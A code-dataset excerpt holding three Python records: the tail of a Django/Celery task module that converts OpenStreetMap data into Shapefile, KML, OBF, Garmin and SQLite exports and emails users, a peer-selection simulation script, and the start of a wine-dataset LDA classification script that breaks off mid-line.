diagnostics.\n \"\"\"\n started = timezone.now()\n from tasks.models import ExportTask\n celery_uid = self.request.id\n try:\n task = ExportTask.objects.get(run__uid=run_uid, name=name)\n celery_uid = self.request.id\n task.celery_uid = celery_uid\n task.status = 'RUNNING'\n task.started_at = started\n task.save()\n logger.debug('Updated task: {0} with uid: {1}'.format(task.name, task.uid))\n except DatabaseError as e:\n logger.error('Updating task {0} state throws: {1}'.format(task.name, e))\n raise e\n\n\nclass OSMConfTask(ExportTask):\n \"\"\"\n Task to create the ogr2ogr conf file.\n \"\"\"\n name = 'OSMConf'\n abort_on_error = True\n\n def run(self, run_uid=None, categories=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n conf = osmconf.OSMConfig(categories, job_name=job_name)\n configfile = conf.create_osm_conf(stage_dir=stage_dir)\n return {'result': configfile}\n\n\nclass OverpassQueryTask(ExportTask):\n \"\"\"\n Class to run an overpass query.\n \"\"\"\n name = 'OverpassQuery'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None, filters=None, bbox=None):\n \"\"\"\n Runs the query and returns the path to the filtered osm file.\n \"\"\"\n self.update_task_state(run_uid=run_uid, name=self.name)\n op = overpass.Overpass(\n bbox=bbox, stage_dir=stage_dir,\n job_name=job_name, filters=filters\n )\n op.run_query() # run the query\n filtered_osm = op.filter() # filter the results\n return {'result': filtered_osm}\n\n\nclass OSMToPBFConvertTask(ExportTask):\n \"\"\"\n Task to convert osm to pbf format.\n Returns the path to the pbf file.\n \"\"\"\n name = 'OSM2PBF'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n osm = stage_dir + job_name + '.osm'\n pbffile = stage_dir + job_name + '.pbf'\n o2p = pbf.OSMToPBF(osm=osm, pbffile=pbffile)\n pbffile = o2p.convert()\n return {'result': pbffile}\n\n\nclass OSMPrepSchemaTask(ExportTask):\n \"\"\"\n Task to create the default sqlite schema.\n \"\"\"\n name = 'OSMSchema'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n osm = stage_dir + job_name + '.pbf'\n sqlite = stage_dir + job_name + '.sqlite'\n osmconf = stage_dir + job_name + '.ini'\n osmparser = osmparse.OSMParser(osm=osm, sqlite=sqlite, 
osmconf=osmconf)\n osmparser.create_spatialite()\n osmparser.create_default_schema()\n osmparser.update_zindexes()\n return {'result': sqlite}\n\n\nclass ThematicLayersExportTask(ExportTask):\n \"\"\"\n Task to export thematic shapefile.\n \"\"\"\n\n name = \"Thematic Shapefile Export\"\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n from tasks.models import ExportRun\n self.update_task_state(run_uid=run_uid, name=self.name)\n run = ExportRun.objects.get(uid=run_uid)\n tags = run.job.categorised_tags\n sqlite = stage_dir + job_name + '.sqlite'\n try:\n t2s = thematic_shp.ThematicSQliteToShp(sqlite=sqlite, tags=tags, job_name=job_name)\n t2s.generate_thematic_schema()\n out = t2s.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in thematic task, %s', str(e))\n raise Exception(e) # hand off to celery..\n\n\nclass ShpExportTask(ExportTask):\n \"\"\"\n Class defining SHP export function.\n \"\"\"\n name = 'Default Shapefile Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n sqlite = stage_dir + job_name + '.sqlite'\n shapefile = stage_dir + job_name + '_shp'\n try:\n s2s = shp.SQliteToShp(sqlite=sqlite, shapefile=shapefile)\n out = s2s.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in shapefile export, %s', str(e))\n raise Exception(e)\n\n\nclass KmlExportTask(ExportTask):\n \"\"\"\n Class defining KML export function.\n \"\"\"\n name = 'KML Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n sqlite = stage_dir + job_name + '.sqlite'\n kmlfile = stage_dir + job_name + '.kml'\n try:\n s2k = kml.SQliteToKml(sqlite=sqlite, kmlfile=kmlfile)\n out = s2k.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in kml export, %s', str(e))\n raise Exception(e)\n\n\nclass ObfExportTask(ExportTask):\n \"\"\"\n Class defining OBF export function.\n \"\"\"\n name = 'OBF Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n pbffile = stage_dir + job_name + '.pbf'\n map_creator_dir = settings.OSMAND_MAP_CREATOR_DIR\n work_dir = stage_dir + 'osmand'\n try:\n o2o = osmand.OSMToOBF(\n pbffile=pbffile, work_dir=work_dir, map_creator_dir=map_creator_dir\n )\n out = o2o.convert()\n obffile = stage_dir + job_name + '.obf'\n shutil.move(out, obffile)\n shutil.rmtree(work_dir)\n return {'result': obffile}\n except Exception as e:\n logger.error('Raised exception in obf export, %s', str(e))\n raise Exception(e)\n\n\nclass SqliteExportTask(ExportTask):\n \"\"\"\n Class defining SQLITE export function.\n \"\"\"\n\n name = 'SQLITE Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n # sqlite already generated by OSMPrepSchema so just return path.\n sqlite = stage_dir + job_name + '.sqlite'\n return {'result': sqlite}\n\n\nclass GarminExportTask(ExportTask):\n \"\"\"\n Class defining GARMIN export function.\n \"\"\"\n\n name = 'Garmin Export'\n _region = '' # set by the task_runner\n\n @property\n def region(self,):\n return self._region\n\n @region.setter\n def region(self, value):\n self._region = value\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n work_dir = stage_dir + 'garmin'\n config 
= settings.GARMIN_CONFIG # get path to garmin config\n pbffile = stage_dir + job_name + '.pbf'\n try:\n o2i = garmin.OSMToIMG(\n pbffile=pbffile, work_dir=work_dir,\n config=config, region=None, debug=False\n )\n o2i.run_splitter()\n out = o2i.run_mkgmap()\n imgfile = stage_dir + job_name + '_garmin.zip'\n shutil.move(out, imgfile)\n shutil.rmtree(work_dir)\n return {'result': imgfile}\n except Exception as e:\n logger.error('Raised exception in garmin export, %s', str(e))\n raise Exception(e)\n\n\nclass GeneratePresetTask(ExportTask):\n \"\"\"\n Generates a JOSM Preset from the exports selected features.\n \"\"\"\n\n name = 'Generate Preset'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n from tasks.models import ExportRun\n from jobs.models import ExportConfig\n self.update_task_state(run_uid=run_uid, name=self.name)\n run = ExportRun.objects.get(uid=run_uid)\n job = run.job\n user = job.user\n feature_save = job.feature_save\n feature_pub = job.feature_pub\n # check if we should create a josm preset\n if feature_save or feature_pub:\n tags = job.tags.all()\n tag_parser = TagParser(tags=tags)\n xml = tag_parser.parse_tags()\n preset_file = ContentFile(xml)\n name = job.name\n filename = job_name + '_preset.xml'\n content_type = 'application/xml'\n config = ExportConfig.objects.create(\n name=name, filename=filename,\n config_type='PRESET', content_type=content_type,\n user=user, published=feature_pub\n )\n config.upload.save(filename, preset_file)\n\n output_path = config.upload.path\n job.configs.clear()\n job.configs.add(config)\n return {'result': output_path}\n\n\nclass FinalizeRunTask(Task):\n \"\"\"\n Finalizes export run.\n\n Cleans up staging directory.\n Updates run with finish time.\n Emails user notification.\n \"\"\"\n\n name = 'Finalize Export Run'\n\n def run(self, run_uid=None, stage_dir=None):\n from tasks.models import ExportRun\n run = ExportRun.objects.get(uid=run_uid)\n run.status = 'COMPLETED'\n tasks = run.tasks.all()\n # mark run as incomplete if any tasks fail\n for task in tasks:\n if task.status == 'FAILED':\n run.status = 'INCOMPLETE'\n finished = timezone.now()\n run.finished_at = finished\n run.save()\n try:\n shutil.rmtree(stage_dir)\n except IOError as e:\n logger.error('Error removing {0} during export finalize'.format(stage_dir))\n\n # send notification email to user\n hostname = settings.HOSTNAME\n url = 'http://{0}/exports/{1}'.format(hostname, run.job.uid)\n addr = run.user.email\n subject = \"Your HOT Export is ready\"\n to = [addr]\n from_email = 'HOT Exports '\n ctx = {\n 'url': url,\n 'status': run.status\n }\n text = get_template('email/email.txt').render(Context(ctx))\n html = get_template('email/email.html').render(Context(ctx))\n msg = EmailMultiAlternatives(subject, text, to=to, from_email=from_email)\n msg.attach_alternative(html, \"text/html\")\n msg.send()\n\n\nclass ExportTaskErrorHandler(Task):\n \"\"\"\n Handles un-recoverable errors in export tasks.\n \"\"\"\n\n name = \"Export Task Error Handler\"\n\n def run(self, run_uid, task_id=None, stage_dir=None):\n from tasks.models import ExportRun\n finished = timezone.now()\n run = ExportRun.objects.get(uid=run_uid)\n run.finished_at = finished\n run.status = 'FAILED'\n run.save()\n try:\n if os.path.isdir(stage_dir):\n #leave the stage_dir in place for debugging\n #shutil.rmtree(stage_dir)\n pass\n except IOError as e:\n logger.error('Error removing {0} during export finalize'.format(stage_dir))\n hostname = settings.HOSTNAME\n url = 
'http://{0}/exports/{1}'.format(hostname, run.job.uid)\n addr = run.user.email\n subject = \"Your HOT Export Failed\"\n # email user and administrator\n to = [addr, settings.TASK_ERROR_EMAIL]\n from_email = 'HOT Exports '\n ctx = {\n 'url': url,\n 'task_id': task_id\n }\n text = get_template('email/error_email.txt').render(Context(ctx))\n html = get_template('email/error_email.html').render(Context(ctx))\n msg = EmailMultiAlternatives(subject, text, to=to, from_email=from_email)\n msg.attach_alternative(html, \"text/html\")\n msg.send()\n", "sub_path": "tasks/export_tasks.py", "file_name": "export_tasks.py", "file_ext": "py", "file_size_in_byte": 16227, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "celery.utils.log.get_task_logger", "line_number": 25, "usage_type": "call"}, {"api_name": "celery.Task", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 56, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 60, "usage_type": "call"}, {"api_name": "django.conf.settings.EXPORT_DOWNLOAD_ROOT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 74, "usage_type": "call"}, {"api_name": "django.conf.settings.EXPORT_MEDIA_ROOT", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 78, "usage_type": "name"}, {"api_name": "tasks.models.ExportTaskResult", "line_number": 81, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 104, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 106, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 106, "usage_type": "name"}, {"api_name": "cPickle.dumps", "line_number": 108, "usage_type": "call"}, {"api_name": "tasks.models.ExportTaskException", "line_number": 109, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 112, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 112, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 114, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 114, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 129, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 129, "usage_type": "name"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 133, 
"usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.DatabaseError", "line_number": 140, "usage_type": "name"}, {"api_name": "utils.osmconf.OSMConfig", "line_number": 154, "usage_type": "call"}, {"api_name": "utils.osmconf", "line_number": 154, "usage_type": "name"}, {"api_name": "utils.overpass.Overpass", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.overpass", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.pbf.OSMToPBF", "line_number": 192, "usage_type": "call"}, {"api_name": "utils.pbf", "line_number": 192, "usage_type": "name"}, {"api_name": "utils.osmconf", "line_number": 208, "usage_type": "name"}, {"api_name": "utils.osmparse.OSMParser", "line_number": 209, "usage_type": "call"}, {"api_name": "utils.osmparse", "line_number": 209, "usage_type": "name"}, {"api_name": "utils.osmconf", "line_number": 209, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 226, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 226, "usage_type": "name"}, {"api_name": "utils.thematic_shp.ThematicSQliteToShp", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.thematic_shp", "line_number": 230, "usage_type": "name"}, {"api_name": "utils.shp.SQliteToShp", "line_number": 250, "usage_type": "call"}, {"api_name": "utils.shp", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.kml.SQliteToKml", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.kml", "line_number": 269, "usage_type": "name"}, {"api_name": "django.conf.settings.OSMAND_MAP_CREATOR_DIR", "line_number": 286, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 286, "usage_type": "name"}, {"api_name": "utils.osmand.OSMToOBF", "line_number": 289, "usage_type": "call"}, {"api_name": "utils.osmand", "line_number": 289, "usage_type": "name"}, {"api_name": "shutil.move", "line_number": 294, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 295, "usage_type": "call"}, {"api_name": "django.conf.settings.GARMIN_CONFIG", "line_number": 335, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 335, "usage_type": "name"}, {"api_name": "utils.garmin.OSMToIMG", "line_number": 338, "usage_type": "call"}, {"api_name": "utils.garmin", "line_number": 338, "usage_type": "name"}, {"api_name": "shutil.move", "line_number": 345, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 346, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 364, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 364, "usage_type": "name"}, {"api_name": "jobs.presets.TagParser", "line_number": 372, "usage_type": "call"}, {"api_name": "django.core.files.base.ContentFile", "line_number": 374, "usage_type": "call"}, {"api_name": "jobs.models.ExportConfig.objects.create", "line_number": 378, "usage_type": "call"}, {"api_name": "jobs.models.ExportConfig.objects", "line_number": 378, "usage_type": "attribute"}, {"api_name": "jobs.models.ExportConfig", "line_number": 378, "usage_type": "name"}, {"api_name": "celery.Task", "line_number": 391, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 404, "usage_type": 
"call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 404, "usage_type": "name"}, {"api_name": "tasks.models", "line_number": 406, "usage_type": "name"}, {"api_name": "tasks.models", "line_number": 408, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 411, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 411, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 415, "usage_type": "call"}, {"api_name": "django.conf.settings.HOSTNAME", "line_number": 420, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 420, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 430, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 430, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 431, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 431, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 432, "usage_type": "call"}, {"api_name": "celery.Task", "line_number": 437, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 446, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 446, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 447, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 447, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 447, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 452, "usage_type": "call"}, {"api_name": "os.path", "line_number": 452, "usage_type": "attribute"}, {"api_name": "django.conf.settings.HOSTNAME", "line_number": 458, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 458, "usage_type": "name"}, {"api_name": "django.conf.settings.TASK_ERROR_EMAIL", "line_number": 463, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 463, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 469, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 469, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 470, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 470, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 471, "usage_type": "call"}]}
+{"seq_id": "357491099", "text": "'''\n File: stepping_exp.py\n Author: Nicholas Mattei (nsmattei@gmail.com)\n Date: July 30th, 2015\n\n * Copyright (c) 2015, Nicholas Mattei and NICTA\n * All rights reserved.\n *\n * Developed by: Nicholas Mattei\n * NICTA\n * http://www.nickmattei.net\n * http://www.preflib.org\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are met:\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * * Neither the name of NICTA nor the\n * names of its contributors may be used to endorse or promote products\n * derived from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY NICTA ''AS IS'' AND ANY\n * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL NICTA BE LIABLE FOR ANY\n * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \n \n\nAbout\n--------------------\n This runs a simple stepping experiment and saves the results to a file.\n Note that it DOES NOT TRACK the score vector etc. This is meant \n as a way to run a series of steps -- not a comprehensive experimental framework.\n \n'''\nimport pickle\nimport numpy as np\nimport random\nimport itertools\nimport pandas as pd\nfrom collections import Counter\n\n_DEBUG = False\n\nfrom peerselect import impartial\nfrom peerselect import profile_generator\n\n# Set the Seed...\n# random.seed(15)\n\nclass Impartial:\n VANILLA = \"Vanilla\"\n PARTITION = \"Partition\"\n DOLLAR = \"DollarPartition\"\n DPR = \"DollarPartitionRaffle\"\n CREDIABLE = \"CredibleSubset\"\n RAFFLE = \"DollarRaffle\"\n ALL = (VANILLA, DOLLAR, PARTITION, RAFFLE, CREDIABLE, DPR)\n\n\n# Exponential.\n#scores = [pow(n, 4), pow(n, 3), pow(n, 2), n, 1]\n#dist = [0.1, 0.2, 0.2, 0.2, 0.3]\n\n#Borda\n#scores = [3, 2, 1, 0]\n#dist = [0.25, 0.25, 0.25, 0.25]\n\n# Psuedo 10 point Normal... \\sigma~=1\nscores = [8, 7, 6, 5, 4, 3, 2, 1, 0]\n# Normal...\ndist = [0.03, 0.05, 0.12, 0.15, 0.30, 0.15, 0.12, 0.05, 0.03]\n\ns = 1000\ntest_n = [130]\ntest_k = [25]\ntest_m = [10, 20, 40]\ntest_l = [5]\ntest_p = [0.1]\n\n# Output File name\n## Save the current runs\nout_name = \"../notebooks/pickled_runs/pub_NSF1000s_130n_25k_10-40m_5l.pickle\"\n\n# Map for all results... We'll build a high level index out of this later...\nresults = {}\nfor n,k,m,l,p in itertools.product(test_n, test_k, test_m, test_l, test_p):\n \n # Compute some artifacts from the scoring distributions.\n agents = np.arange(0, n)\n \n #Bit Hacky but faster.... 
t_profile = profile_generator.generate_mallows_mixture_profile(agents, agents, [1.0], [agents], [0.0])\n t_matrix = profile_generator.profile_classes_to_score_matrix(t_profile, scores, dist)\n \n #Determine how many of each bin we have.\n # Compute the binning from The SCORE MATRIX ---> Tally guy 0.\n t = Counter(list(t_matrix[:,0]))\n size = [t[k] for k in sorted(t.keys(), reverse=True)]\n # Determine how many of each bin we should have...\n n_from_bin = [0]*len(size)\n left = k\n for i,j in enumerate(n_from_bin):\n if left > 0: n_from_bin[i] = min(size[i], left)\n left -= size[i]\n cum_n_from_bin = list(np.cumsum(n_from_bin))\n \n # Determine what bin they should go in according to the ground truth.\n # Just take the first guy's vector and iterate over it.\n # Guy i got score v and should be in the corresponding bin as indexed by the score vector.\n in_bin = {i:scores.index(v) for i,v in enumerate(list(t_matrix[:, 0]))}\n \n # Containers for Results\n count_results = {x:[0]*k for x in Impartial.ALL}\n bin_results = {x:[0]*len(size) for x in Impartial.ALL}\n for c_sample in range(s):\n #Generate a full profile and a clustering.\n profile = profile_generator.generate_mallows_mixture_profile(agents, agents, [1.0], [agents], [p])\n clustering = impartial.even_partition_order(sorted(agents, key=lambda j: random.random()), l)\n\n #Generate an approx-m-regular assignment.\n m_assignment = profile_generator.generate_approx_m_regular_assignment(agents, m, clustering, randomize=True)\n score_matrix = profile_generator.profile_classes_to_score_matrix(profile, scores, dist)\n score_matrix = profile_generator.restrict_score_matrix(score_matrix, m_assignment)\n\n #Compute Target Set.\n target_set = impartial.vanilla(score_matrix, k)\n\n ws = {}\n ws[Impartial.DOLLAR] = impartial.dollar_partition_explicit(score_matrix, k, clustering, normalize=True)\n size_ws = len(ws[Impartial.DOLLAR])\n # Let everyone else have the same size set so they are all comparable.\n ws[Impartial.VANILLA] = [i for i,j in impartial.vanilla(score_matrix, size_ws)]\n # Let CRED, PART, and RAFFLE have bigger sets...\n ws[Impartial.PARTITION] = impartial.partition_explicit(score_matrix, size_ws, clustering, normalize=False)\n ws[Impartial.CREDIABLE] = impartial.credible_subset(score_matrix, size_ws, m, normalize=False)\n ws[Impartial.DPR] = impartial.dollar_raffle_explicit(score_matrix, size_ws, clustering, normalize=True)\n #Call Raffle and have everyone in a cluster by themselves = Dollar.\n ws[Impartial.RAFFLE] = impartial.dollar_raffle(score_matrix, size_ws, n, randomize=True, normalize=True)\n \n # Update the Per position information.\n for i,tup in enumerate(target_set):\n a = tup[0]\n for x in Impartial.ALL:\n if a in ws[x]: count_results[x][i] += 1\n \n # Update the per bin picking for each type.\n for x in Impartial.ALL:\n for e in ws[x]:\n bin_results[x][in_bin[e]] += 1\n \n # Make cumulative versions for easy graphing...\n cum_count_results = {x:[0]*k for x in Impartial.ALL}\n cum_bin_results = {x:[0]*len(size) for x in Impartial.ALL}\n for x in Impartial.ALL:\n cum_count_results[x] = [v/float((i+1.) 
* s) for i,v in enumerate(list(np.cumsum(count_results[x])))] \n cum_bin_results[x] = [v/float(cum_n_from_bin[i] * s) for i,v in enumerate(np.cumsum(bin_results[x]))]\n # Normalize the counts and bins by n Samples to get a rate.\n count_results[x] = [float(i) / float(s) for i in count_results[x]]\n bin_results[x] = [float(i) / float(s) for i in bin_results[x]]\n \n # This should likely be some kind of multiindex but I can't figure it out.\n t = (n, k, m, l, p, \"count\")\n results[t] = pd.DataFrame(count_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"cum_count\")\n results[t] = pd.DataFrame(cum_count_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"bin\")\n results[t] = pd.DataFrame(bin_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"cum_bin\")\n results[t] = pd.DataFrame(cum_bin_results)\n results[t].index += 1\n print(\"Finished: \" + \",\".join([str(x) for x in [n, k, m, l, p]]))\n\n## Save the current runs\nwith open(out_name, 'wb') as output_file:\n pickle.dump(results, output_file)\n\nprint(\"Done\")\nprint(\"Wrote to: \" + out_name)\nprint(\"Score: \" + str(scores))\nprint(\"Distribution: \" + str(dist))\nprint(\"Size: \" + str(size))\n", "sub_path": "peerselect/experiments/stepping_exp.py", "file_name": "stepping_exp.py", "file_ext": "py", "file_size_in_byte": 8098, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "itertools.product", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 98, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_mallows_mixture_profile", "line_number": 101, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 101, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.profile_classes_to_score_matrix", "line_number": 102, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 102, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 114, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_mallows_mixture_profile", "line_number": 126, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 126, "usage_type": "name"}, {"api_name": "peerselect.impartial.even_partition_order", "line_number": 127, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 127, "usage_type": "name"}, {"api_name": "random.random", "line_number": 127, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_approx_m_regular_assignment", "line_number": 130, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 130, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.profile_classes_to_score_matrix", "line_number": 131, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 131, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.restrict_score_matrix", "line_number": 132, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 132, "usage_type": "name"}, {"api_name": "peerselect.impartial.vanilla", "line_number": 135, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 135, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_partition_explicit", "line_number": 138, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 
138, "usage_type": "name"}, {"api_name": "peerselect.impartial.vanilla", "line_number": 141, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 141, "usage_type": "name"}, {"api_name": "peerselect.impartial.partition_explicit", "line_number": 143, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 143, "usage_type": "name"}, {"api_name": "peerselect.impartial.credible_subset", "line_number": 144, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 144, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_raffle_explicit", "line_number": 145, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 145, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_raffle", "line_number": 147, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.cumsum", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 181, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "16066853", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n2021.09.18\nauthor: yasin sahin\nwritten to construct lda algorithm together with logistic regression\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\n# importing dataset\ndataset = pd.read_csv('Wine.csv')\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,-1].values\n\n# splitting training and test set\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, random_state = 0)\n\n# Scaling independent variables\nsc_x = StandardScaler()\nx_train = sc_x.fit_transform(x_train)\nx_test = sc_x.transform(x_test)\n\n# applying PCA and reducing dimension to two\nlda = LinearDiscriminantAnalysis(n_components = 2) # initiliazing pca instant\nx_train = lda.fit_transform(x_train, 